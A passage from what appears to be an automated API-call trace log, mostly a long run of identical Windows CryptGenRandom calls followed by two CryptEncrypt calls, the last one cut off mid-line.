pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.388] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.389] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.390] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.391] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.391] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, 